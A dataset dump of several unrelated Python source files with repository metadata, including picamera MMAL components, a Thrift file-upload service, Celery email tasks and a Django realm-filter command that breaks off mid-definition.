specified *input* is read in chunks the size of the configured output
buffer(s) until the input is exhausted. The :meth:`wait` method can be
used to block until this occurs. If the output buffer is configured to
use a full-frame unencoded format (like I420 or RGB), frame-end flags will
be automatically generated by the source. When the input is exhausted an
empty buffer with the End Of Stream (EOS) flag will be sent.
The component provides all picamera's usual IO-handling characteristics; if
*input* is a string, a file with that name will be opened as the input and
closed implicitly when the component is closed. Otherwise, the input will
not be closed implicitly (the component did not open it, so the assumption
is that closing *input* is the caller's responsibility). If *input* is an
object with a ``read`` method it is assumed to be a file-like object and is
used as is. Otherwise, *input* is assumed to be a readable object
supporting the buffer protocol (which is wrapped in a :class:`BufferIO`
stream).
"""
__slots__ = ('_stream', '_opened', '_thread')
def __init__(self, input):
super(MMALPythonSource, self).__init__()
self._inputs = ()
self._outputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, 0),)
self._stream, self._opened = open_stream(input, output=False)
self._thread = None
def close(self):
super(MMALPythonSource, self).close()
if self._outputs:
self._outputs[0].close()
self._outputs = ()
if self._stream:
close_stream(self._stream, self._opened)
self._stream = None
def enable(self):
super(MMALPythonSource, self).enable()
self._thread = Thread(target=self._send_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonSource, self).disable()
if self._thread:
self._thread.join()
self._thread = None
def wait(self, timeout=None):
"""
Wait for the source to send all bytes from the specified input. If
*timeout* is specified, it is the number of seconds to wait for
completion. The method returns ``True`` if the source completed within
the specified timeout and ``False`` otherwise.
"""
if not self.enabled:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'cannot wait on disabled component')
self._thread.join(timeout)
return not self._thread.is_alive()
def _send_run(self):
# Calculate the size of a frame if possible (i.e. when the output
# format is an unencoded full frame format). If it's an unknown /
# encoded format, we've no idea what the framesize is (this would
# presumably require decoding the stream) so leave framesize as None.
video = self._outputs[0]._format[0].es[0].video
try:
framesize = (
MMALPythonPort._FORMAT_BPP[str(self._outputs[0].format)]
* video.width
* video.height)
except KeyError:
framesize = None
frameleft = framesize
while self.enabled:
buf = self._outputs[0].get_buffer(timeout=0.1)
if buf:
try:
if frameleft is None:
send = buf.size
else:
send = min(frameleft, buf.size)
with buf as data:
if send == buf.size:
try:
# readinto() is by far the fastest method of
# getting data into the buffer
buf.length = self._stream.readinto(data)
except AttributeError:
# if there's no readinto() method, fallback on
# read() and the data setter (memmove)
buf.data = self._stream.read(buf.size)
else:
buf.data = self._stream.read(send)
if frameleft is not None:
frameleft -= buf.length
if not frameleft:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END
frameleft = framesize
if not buf.length:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_EOS
break
finally:
self._outputs[0].send_buffer(buf)
@property
def name(self):
return 'py.source'
class MMALPythonComponent(MMALPythonBaseComponent):
"""
Provides a Python-based MMAL component with a *name*, a single input and
the specified number of *outputs* (default 1). The :meth:`connect` and
:meth:`disconnect` methods can be used to establish or break a connection
from the input port to an upstream component.
Typically descendents will override the :meth:`_handle_frame` method to
respond to buffers sent to the input port, and will set
:attr:`MMALPythonPort.supported_formats` in the constructor to define the
formats that the component will work with.
"""
__slots__ = ('_name', '_thread', '_queue', '_error')
def __init__(self, name='py.component', outputs=1):
super(MMALPythonComponent, self).__init__()
self._name = name
self._thread = None
self._error = None
self._queue = MMALQueue.create()
self._inputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_INPUT, 0),)
self._outputs = tuple(
MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, n)
for n in range(outputs)
)
def close(self):
super(MMALPythonComponent, self).close()
self.disconnect()
if self._inputs:
self._inputs[0].close()
self._inputs = ()
for output in self._outputs:
output.disable()
self._outputs = ()
self._queue.close()
self._queue = None
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
return self.inputs[0].connect(source)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
@property
def name(self):
return self._name
def _commit_port(self, port):
"""
Overridden to to copy the input port's configuration to the output
port(s), and to ensure that the output port(s)' format(s) match
the input port's format.
"""
super(MMALPythonComponent, self)._commit_port(port)
if port.type == mmal.MMAL_PORT_TYPE_INPUT:
for output in self.outputs:
output.copy_from(port)
elif port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
if port.format != self.inputs[0].format:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'output format mismatch')
def enable(self):
super(MMALPythonComponent, self).enable()
if not self._thread:
self._thread = Thread(target=self._thread_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonComponent, self).disable()
if self._thread:
self._thread.join()
self._thread = None
if self._error:
raise self._error
def _thread_run(self):
try:
while self._enabled:
buf = self._queue.get(timeout=0.1)
if buf:
try:
handler = {
0: self._handle_frame,
mmal.MMAL_EVENT_PARAMETER_CHANGED: self._handle_parameter_changed,
mmal.MMAL_EVENT_FORMAT_CHANGED: self._handle_format_changed,
mmal.MMAL_EVENT_ERROR: self._handle_error,
mmal.MMAL_EVENT_EOS: self._handle_end_of_stream,
}[buf.command]
if handler(self.inputs[0], buf):
self._enabled = False
finally:
buf.release()
except Exception as e:
self._error = e
self._enabled = False
def _handle_frame(self, port, buf):
"""
Handles frame data buffers (where :attr:`MMALBuffer.command` is set to
0).
Typically, if the component has output ports, the method is expected to
fetch a buffer from the output port(s), write data into them, and send
them back to their respective ports.
Return values are as for normal event handlers (``True`` when no more
buffers are expected, ``False`` otherwise).
"""
return False
def _handle_format_changed(self, port, buf):
"""
Handles format change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_FORMAT_CHANGED).
The default implementation re-configures the input port of the
component and emits the event on all output ports for downstream
processing. Override this method if you wish to do something else in
response to format change events.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_FORMAT_CHANGED_T
structure). Use ``mmal_event_format_changed_get`` on the buffer's data
to extract the event.
"""
with buf as data:
event = mmal.mmal_event_format_changed_get(buf._buf)
if port.connection:
# Handle format change on the source output port, if any. We
# don't check the output port capabilities because it was the
# port that emitted the format change in the first case so it'd
# be odd if it didn't support them (or the format requested)!
output = port.connection._source
output.disable()
if isinstance(output, MMALPythonPort):
mmal.mmal_format_copy(output._format, event[0].format)
else:
mmal.mmal_format_copy(output._port[0].format, event[0].format)
output.commit()
output.buffer_count = (
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min)
output.buffer_size = (
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
if isinstance(output, MMALPythonPort):
output.enable()
else:
output.enable(port.connection._transfer)
# Now deal with the format change on this input port (this is only
# called from _thread_run so port must be an input port)
try:
if not (port.capabilities & mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE):
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'port %s does not support event change' % self.name)
mmal.mmal_format_copy(port._format, event[0].format)
self._commit_port(port)
port.pool.resize(
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min,
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
port.buffer_count = len(port.pool)
port.buffer_size = port.pool[0].size
except:
# If this port can't handle the format change, or if anything goes
# wrong (like the owning component doesn't like the new format)
# stop the pipeline (from here at least)
if port.connection:
port.connection.disable()
raise
# Chain the format-change onward so everything downstream sees it.
# NOTE: the callback isn't given the format-change because there's no
# image data in it
for output in self.outputs:
out_buf = output.get_buffer()
out_buf.copy_from(buf)
output.send_buffer(out_buf)
return False
def _handle_parameter_changed(self, port, buf):
"""
Handles parameter change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_PARAMETER_CHANGED).
The default implementation does nothing but return ``False``
(indicating that processing should continue). Override this in
descendents to respond to parameter changes.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_PARAMETER_CHANGED_T
structure).
"""
return False
def _handle_error(self, port, buf):
"""
Handles error notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_ERROR).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to error events.
The *port* parameter is the port into which the event arrived.
"""
return True
def _handle_end_of_stream(self, port, buf):
"""
Handles end-of-stream notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_EOS).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to the end of stream.
The *port* parameter is the port into which the event arrived.
"""
return True
class MMALPythonTarget(MMALPythonComponent):
"""
Provides a simple component that writes all received buffers to the
specified *output* until a frame with the *done* flag is seen (defaults to
MMAL_BUFFER_HEADER_FLAG_EOS indicating End Of Stream).
The component provides all picamera's usual IO-handling characteristics; if
*output* is a string, a file with that name will be opened as the output
and closed implicitly when the component is closed. Otherwise, the output
will not be closed implicitly (the component did not open it, so the
assumption is that closing *output* is the caller's responsibility). If
*output* is an object with a ``write`` method it is assumed to be a
file-like object and is used as is. Otherwise, *output* is assumed to be a
writeable object supporting the buffer protocol (which is wrapped in a
:class:`BufferIO` stream).
"""
__slots__ = ('_opened', '_stream', '_done', '_event')
def __init__(self, output, done=mmal.MMAL_BUFFER_HEADER_FLAG_EOS):
super(MMALPythonTarget, self).__init__(name='py.target', outputs=0)
self._stream, self._opened = open_stream(output)
self._done = done
self._event = Event()
# Accept all the formats picamera generally produces (user can add
# other esoteric stuff if they need to)
self.inputs[0].supported_formats = {
mmal.MMAL_ENCODING_MJPEG,
mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
def close(self):
super(MMALPythonTarget, self).close()
close_stream(self._stream, self._opened)
def enable(self):
self._event.clear()
super(MMALPythonTarget, self).enable()
def wait(self, timeout=None):
"""
Wait for the output to be "complete" as defined by the constructor's
*done* parameter. If *timeout* is specified it is the number of seconds
to wait for completion. The method returns ``True`` if the target
completed within the specified timeout and ``False`` otherwise.
"""
return self._event.wait(timeout)
def _handle_frame(self, port, buf):
self._stream.write(buf.data)
if buf.flags & self._done:
self._event.set()
return True
return False
class MMALPythonConnection(MMALBaseConnection):
"""
Represents a connection between an :class:`MMALPythonBaseComponent` and a
:class:`MMALBaseComponent` or another :class:`MMALPythonBaseComponent`.
The constructor accepts arguments providing the *source* :class:`MMALPort`
(or :class:`MMALPythonPort`) and *target* :class:`MMALPort` (or
:class:`MMALPythonPort`).
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALPythonConnection`
object sending the data, and the :class:`MMALBuffer` object containing
data. The callable may optionally manipulate the :class:`MMALBuffer` and
return it to permit it to continue traversing the connection, or return
``None`` in which case the buffer will be released.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
connections between Python and and MMAL components, in preference
order. Note that OPAQUE is not present in contrast with the default
formats in :class:`MMALConnection`.
"""
__slots__ = ('_enabled', '_callback')
default_formats = (
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not (
isinstance(source, MMALPythonPort) or
isinstance(target, MMALPythonPort)
):
raise PiCameraValueError('use a real MMAL connection')
super(MMALPythonConnection, self).__init__(source, target, formats)
self._enabled = False
self._callback = callback
def close(self):
self.disable()
super(MMALPythonConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return self._enabled
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
if not self._enabled:
self._enabled = True
if isinstance(self._target, MMALPythonPort):
# Connected python input ports require no callback
self._target.enable()
else:
# Connected MMAL input ports don't know they're connected so
# provide a dummy callback
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.enable(lambda port, buf: True)
if isinstance(self._source, MMALPythonPort):
# Connected python output ports are nothing more than thin
# proxies for the target input port; no callback required
self._source.enable()
else:
# Connected MMAL output ports are made to transfer their
# data to the Python input port
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._source.enable(self._transfer)
def disable(self):
"""
Disables the connection.
"""
self._enabled = False
self._source.disable()
self._target.disable()
def _transfer(self, port, buf):
while self._enabled:
try:
dest = self._target.get_buffer(timeout=0.01)
except PiCameraPortDisabled:
dest = None
if dest:
dest.copy_from(buf)
try:
self._target.send_buffer(dest)
except PiCameraPortDisabled:
pass
return False
@property
def name(self):
return '%s/%s' % (self._source.name, self._target.name)
def __repr__(self):
try:
return '<MMALPythonConnection "%s">' % self.name
except NameError:
return '<MMALPythonConnection closed>'
| [
"[email protected]"
]
| |
63049adb954204a6d260ac373203abbc430dd063 | 67568ac53039fd633f9017bd368a13258191e1b2 | /thrift_example/file_transport/file/FileService.py | 429826b7eddda8fd50d339c35c87f6a40c1cd0ea | []
| no_license | starryrbs/rpc_shared | 22012bbb5e0916a178e088f1be58acedd589c13d | 6e4feb2929337ccb885ff629c13a0a6d3bc457d2 | refs/heads/master | 2022-12-11T04:27:24.176393 | 2020-09-02T16:01:37 | 2020-09-02T16:01:37 | 291,492,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | true | 7,528 | py | #
# Autogenerated by Thrift Compiler (0.12.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
all_structs = []
class Iface(object):
def uploadFile(self, filedata):
"""
Parameters:
- filedata
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def uploadFile(self, filedata):
"""
Parameters:
- filedata
"""
self.send_uploadFile(filedata)
return self.recv_uploadFile()
def send_uploadFile(self, filedata):
self._oprot.writeMessageBegin('uploadFile', TMessageType.CALL, self._seqid)
args = uploadFile_args()
args.filedata = filedata
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_uploadFile(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = uploadFile_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "uploadFile failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["uploadFile"] = Processor.process_uploadFile
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_uploadFile(self, seqid, iprot, oprot):
args = uploadFile_args()
args.read(iprot)
iprot.readMessageEnd()
result = uploadFile_result()
try:
result.success = self._handler.uploadFile(args.filedata)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("uploadFile", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class uploadFile_args(object):
"""
Attributes:
- filedata
"""
def __init__(self, filedata=None,):
self.filedata = filedata
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.filedata = File()
self.filedata.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('uploadFile_args')
if self.filedata is not None:
oprot.writeFieldBegin('filedata', TType.STRUCT, 1)
self.filedata.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(uploadFile_args)
uploadFile_args.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'filedata', [File, None], None, ), # 1
)
class uploadFile_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('uploadFile_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(uploadFile_result)
uploadFile_result.thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
)
fix_spec(all_structs)
del all_structs
| [
"[email protected]"
]
| |
5cb291f086a1a6e113110c2af91826068dd57189 | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /all-gists/4287546/snippet.py | 9124f440cdeccffaef8a4bd8d92dd5e133c999f6 | [
"MIT"
]
| permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 680 | py | # FROM: http://en.wikipedia.org/wiki/Base_36#Python_implementation
def base36encode(number):
"""Converts an integer into a base36 string."""
ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
if not isinstance(number, (int, long)):
raise TypeError('This function must be called on an integer.')
base36 = ''
sign = ''
if number < 0:
sign = '-'
number = -number
if 0 <= number < len(ALPHABET):
return sign + ALPHABET[number]
while number != 0:
number, i = divmod(number, len(ALPHABET))
base36 = ALPHABET[i] + base36
return sign + base36
def base36decode(number):
return int(number, 36) | [
"[email protected]"
]
| |
666459957700b84b14bec98f21fbd9d2c6441c2b | 7236d1d4873faa9735fd5e2d4598b211a370f731 | /project/n/projects/projects/ecommapp/ecommerce/migrations/0020_auto_20200928_1630.py | 7ceab26f28c88cea212b50ab80571813c500c591 | []
| no_license | Dreambigxz/my_first_django_app | 05f5a5d330d72084489f9306fca9ca232af13999 | 9e21ebcbe63c7394280558d2977ef8a796960e0d | refs/heads/main | 2023-01-03T18:45:20.712074 | 2020-10-23T09:05:47 | 2020-10-23T09:05:47 | 306,180,592 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | # Generated by Django 3.0.8 on 2020-09-28 15:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ecommerce', '0019_products_color'),
]
operations = [
migrations.AlterField(
model_name='products',
name='color',
field=models.CharField(choices=[('YL', 'Yellow'), ('RD', 'Red'), ('OR', 'Orange'), ('GR', 'Green')], default='RD', max_length=200),
),
]
| [
"[email protected]"
]
| |
0209945db389ffcf041bf8356b57309837cca01c | bc233c24523f05708dd1e091dca817f9095e6bb5 | /bitmovin_api_sdk/models/profile_h262.py | b8e281c4665dfd372553426648bec8a362d66ae8 | [
"MIT"
]
| permissive | bitmovin/bitmovin-api-sdk-python | e3d6cf8eb8bdad62cb83ec77c0fc4950b06b9cdd | b0860c0b1be7747cf22ad060985504da625255eb | refs/heads/main | 2023-09-01T15:41:03.628720 | 2023-08-30T10:52:13 | 2023-08-30T10:52:13 | 175,209,828 | 13 | 14 | MIT | 2021-04-29T12:30:31 | 2019-03-12T12:47:18 | Python | UTF-8 | Python | false | false | 194 | py | # coding: utf-8
from enum import Enum
from six import string_types, iteritems
from bitmovin_api_sdk.common.poscheck import poscheck_model
class ProfileH262(Enum):
MPEG2_422 = "MPEG2_422"
| [
"[email protected]"
]
| |
27e87424929b5c8237e98b92155346589f22cff5 | f00ad57c98e554470a72511dda7a7bfd160aca19 | /others/test_compress_str.py | 21fe737a9d075590a8f39e8909d0acdd69b93853 | []
| no_license | fanzhangg/algorithm-problems | d60115210aaaffcd094b34b9db5b46dadf93fe9e | 43b111ad625f197ba0905abceab9ee4484284e08 | refs/heads/master | 2021-07-12T20:24:46.265700 | 2020-07-06T17:58:31 | 2020-07-06T17:58:31 | 171,220,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 211 | py | from unittest import TestCase
from compress_string import compress_str
class TestCompressStr(TestCase):
def test_compress_str(self):
self.assertEqual(compress_str("AAAAaaBCCCDDe"), "A4a2B1C3D2e1")
| [
"[email protected]"
]
| |
497ff7a37a21b8d7b26e76ad4a2070a35baf71cc | bb87afa0fd2f5466f282ba93779293449ae72e9f | /apps/article/tasks.py | 0377213159cd91d4dfd25488e3ce850c0d8f288e | [
"MIT"
]
| permissive | xuechuance/website | 14d50e6c66f4315f5829f5a2707fc7bdf3925266 | 91a017ea26806136a89f12d8620a4d99676a7497 | refs/heads/master | 2020-05-27T06:18:36.403271 | 2019-05-21T04:28:02 | 2019-05-21T04:28:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,889 | py | from __future__ import absolute_import
import datetime
from configparser import ConfigParser
from time import sleep
import requests
from celery import shared_task
from django.core.mail import send_mail
from random import Random
import random
from apps.article.models import Headlines
from apps.user.models import VerifyCode
from website import settings
from website.celery import app
def random_str(randomlength=8):
str=""
chars="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
lenght = len(chars)-1
for i in range(randomlength):
str+=chars[random.randint(0,lenght)]
print(str)
return str
@app.task()
def send_register_email(email,username=None,token=None,send_type='register'):
"""
登录注册等邮件发送
:param email:
:param username:
:param token:
:param send_type:
:return:
"""
code = random_str(4)
email_title = ''
email_body = ''
if send_type =='register':
email_title = '注册用户验证信息'
email_body = "\n".join([u'{0},欢迎加入我的博客'.format(username), u'请访问该链接,完成用户验证,该链接1个小时内有效',
'/'.join([settings.DOMAIN, 'activate', token])])
print('========发送邮件中')
send_stutas = send_mail(email_title,email_body,settings.EMAIL_HOST_USER,[email])
if send_stutas:
print('========发送成功')
pass
elif send_type == 'forget':
VerifyCode.objects.create(code=code, email=email, send_type=send_type)
email_title = '密码重置链接'
email_body = "你的密码重置验证码为:{0}。如非本人操作请忽略,此验证码30分钟后失效。".format(code)
print('========发送邮件中')
send_stutas = send_mail(email_title, email_body, settings.EMAIL_HOST_USER, [email])
if send_stutas:
print('========发送成功')
pass
elif send_type =='update_email':
VerifyCode.objects.create(code=code, email=email, send_type=send_type)
email_title = '修改邮箱链接'
email_body = "你的修改邮箱验证码为:{0}。如非本人操作请忽略,此验证码30分钟后失效。".format(code)
print('========发送邮件中')
send_stutas = send_mail(email_title, email_body, settings.EMAIL_HOST_USER, [email])
if send_stutas:
print('========发送成功')
pass
@app.task()
def error_email(email,title=None,body=None):
email_title = title
email_body = body
send_mail(email_title, email_body, settings.EMAIL_HOST_USER, [email])
@app.task()
def add():
print('发送邮件到**************************************************************' )
sleep(5) # 休息5秒
print('success')
return True
conf = ConfigParser()
conf.read('config.ini')
@app.task()
def getApi():
print('正在获取数据...')
#url = 'http://api01.idataapi.cn:8000/article/idataapi?KwPosition=3&catLabel1=科技&apikey={0}'.format(conf.get('iDataApi','key'))
url = 'http://v.juhe.cn/toutiao/index?type=keji&key={0}'.format(conf.get('AppKey','key'))
headers = {
"Accept-Encoding": "gzip",
"Connection": "close"
}
try:
r = requests.get(url, headers=headers)
if r.status_code == requests.codes.ok:
dict_json = r.json()
list_dict = []
for item in dict_json['result']['data']:
# obj = Headlines(
# url=item['url'],
# title=item['title'],
# category=item['catLabel1'],
# conent=item['content'],
# author_name=item['sourceType'],
# )
obj = Headlines(
url=item['url'],
title=item['title'],
category=item['category'],
conent=item['title'],
author_name=item['author_name'],
)
list_dict.append(obj)
Headlines.objects.bulk_create(list_dict)
print('数据添加成功')
except Exception as e:
print('数据添加失败===正在发生邮件通知管理员',e)
error_email.delay('[email protected]','抓取数据错误','{0}'.format(e))
print('邮件发送成功')
@app.task()
def removeApi():
# 当前日期格式
cur_date = datetime.datetime.now().date()
# 前一天日期
yester_day = cur_date - datetime.timedelta(days=1)
# 前一周日期
day = cur_date - datetime.timedelta(days=7)
print("=======正在删除7天前数据======")
# 查询前一周数据,也可以用range,我用的是glt,lte大于等于
Headlines.objects.filter(add_time__lte=day).delete()
print('======已删除=========')
| [
"[email protected]"
]
| |
21ee44b6155df6c86db7afac320d841dd0a6eea7 | 1d928c3f90d4a0a9a3919a804597aa0a4aab19a3 | /python/zulip/2016/4/realm_filters.py | 3ebd74a423ccd5d544621ba6011b7915cf5d5e90 | []
| no_license | rosoareslv/SED99 | d8b2ff5811e7f0ffc59be066a5a0349a92cbb845 | a062c118f12b93172e31e8ca115ce3f871b64461 | refs/heads/main | 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null | UTF-8 | Python | false | false | 2,844 | py | from __future__ import absolute_import
from __future__ import print_function
from optparse import make_option
from django.core.management.base import BaseCommand
from zerver.models import RealmFilter, all_realm_filters, get_realm
from zerver.lib.actions import do_add_realm_filter, do_remove_realm_filter
import sys
class Command(BaseCommand):
help = """Create a link filter rule for the specified domain.
NOTE: Regexes must be simple enough that they can be easily translated to JavaScript
RegExp syntax. In addition to JS-compatible syntax, the following features are available:
* Named groups will be converted to numbered groups automatically
* Inline-regex flags will be stripped, and where possible translated to RegExp-wide flags
Example: python2.7 manage.py realm_filters --realm=zulip.com --op=add '#(?P<id>[0-9]{2,8})' 'https://trac.humbughq.com/ticket/%(id)s'
Example: python2.7 manage.py realm_filters --realm=zulip.com --op=remove '#(?P<id>[0-9]{2,8})'
Example: python2.7 manage.py realm_filters --realm=zulip.com --op=show
"""
def add_arguments(self, parser):
parser.add_argument('-r', '--realm',
dest='domain',
type=str,
required=True,
help='The name of the realm to adjust filters for.')
parser.add_argument('--op',
dest='op',
type=str,
default="show",
help='What operation to do (add, show, remove).')
parser.add_argument('pattern', metavar='<pattern>', type=str, nargs='?', default=None,
help="regular expression to match")
